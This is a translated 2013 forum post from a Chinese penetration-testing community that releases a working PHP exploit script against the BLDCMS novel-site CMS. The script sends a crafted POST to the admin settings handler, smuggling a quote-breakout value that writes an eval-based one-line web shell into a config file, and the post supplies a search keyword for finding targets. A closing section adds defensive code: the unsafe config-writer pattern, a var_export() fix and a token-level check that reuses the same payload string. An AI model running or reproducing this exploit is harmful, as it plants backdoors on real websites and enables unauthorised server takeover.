中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: BLDCMS(白老大小说) Getshell 0day EXP
Author: admin
Date: 2013-3-26 20:49
A while ago I wanted to go after a hacker's site, and noticed that a neighbouring site on the same server was running BLDCMS, so I downloaded it and had a look... and found a getshell vulnerability.

Then last night 晴天小铸 noticed that someone on 90sec had already posted an analysis of this getshell vulnerability. Damn, somebody beat me to it.

Since it is already out there, I'll release the EXP I wrote earlier.
```php
<?php
echo "-------------------------------------------------------------------------------\r\n"
    ." BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n"
    ." Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n"
    ." 2013.3.21\r\n"
    ." 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n"
    ." 搜索关键字:\"开发者: 白老大小说\"\r\n"
    ."-------------------------------------------------------------------------------\r\n";
$url=$argv[1];   // target host
$dir=$argv[2];   // CMS install directory
$pass=$argv[3];  // parameter name of the one-line shell
// value that closes the single-quoted config literal and appends an eval()
$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass)||empty($url))
{
    exit("请输入参数");
}
else
{
    // form body for the settings handler; the payload travels in the sqlite field
    $fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$eval;
    $length = strlen($fuckdata);
    function getshell($url,$pass)
    {
        global $url,$dir,$pass,$eval,$length,$fuckdata;
        // raw HTTP/1.1 POST request assembled by hand
        $header = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:".$url."\r\n";
        $header .= "Content-Length: ".$length."\r\n";
        $header .= "Connection: Close\r\n";
        $header .= "\r\n";
        $header .= $fuckdata."\r\n\r\n";
        $fp = fsockopen($url, 80,$errno,$errstr,15);
        if (!$fp)
        {
            exit ("利用失败:请检查指定目标是否能正常打开");
        }
        else
        {
            if (!fputs($fp,$header))
            {
                exit ("利用失败");
            }
            else
            {
                $receive = '';
                while (!feof($fp)) {
                    $receive .= @fgets($fp, 1000);
                }
                @fclose($fp);
                echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
            }
        }
    }
}
getshell($url,$pass);
?>
```
by 数据流
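The defender's side of the bug this EXP relies on, as an added example that is neither BLDCMS's code nor the author's: the payload's shape (close a single quote, then eval()) implies a settings writer that pastes request values into a single-quoted PHP literal in conn/config/normal2.php, so the block below shows that unsafe pattern, a hardened writer built on var_export(), and a token-level check that flags a settings file which no longer consists only of literal assignments. The function names, the $config variable and the key list are assumptions; the real BLDCMS writer is not shown on the page.

```php
<?php
// Added illustration (not BLDCMS's code and not the author's): the config-writer pattern
// the payload above implies, a hardened version, and a lint check for generated settings
// files. Function names, the $config variable and the key list are assumptions.

// Unsafe: the raw request value is dropped into a single-quoted PHP literal. With
// magic_quotes_gpc off, a value such as  ';eval($_POST["pass"]);'  closes the quote
// early and the remainder is parsed as code when the settings file is included.
function render_config_unsafe(array $settings): string {
    $php = "<?php\n";
    foreach ($settings as $key => $value) {
        $php .= "\$config['$key'] = '$value';\n";
    }
    return $php;
}

// Hardened: var_export() emits a real PHP string literal (quotes and backslashes
// escaped), so the value can only ever be data, and the key list is fixed, so the
// request cannot add entries of its own. Storing settings as JSON instead of PHP
// avoids the problem entirely.
function render_config_safe(array $settings, array $allowed_keys): string {
    $php = "<?php\n";
    foreach ($allowed_keys as $key) {
        $value = (string)($settings[$key] ?? '');
        $php .= '$config[' . var_export($key, true) . '] = ' . var_export($value, true) . ";\n";
    }
    return $php;
}

// Integrity check for a deploy hook or file monitor: a settings file should contain
// only assignments of literals. Any other token (eval, a call, an include, ...) means
// the file has turned into executable code.
function config_tokens_look_like_data(string $php): bool {
    $allowed = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_VARIABLE,
                T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];
    foreach (token_get_all($php) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) return false;
        } elseif (!in_array($tok, ['[', ']', '=', ';'], true)) {
            return false;
        }
    }
    return true;
}

// Constructed input: the same breakout value the EXP above sends in the sqlite field.
$input = ['sitename' => 'a', 'sqlite' => '\';eval($_POST["pass"]);\''];
var_dump(config_tokens_look_like_data(render_config_unsafe($input)));
var_dump(config_tokens_look_like_data(render_config_safe($input, ['sitename', 'sqlite'])));
```

The unsafe rendering fails the check because the generated file contains an eval token outside any string, while the var_export() version keeps the whole payload inside one string literal.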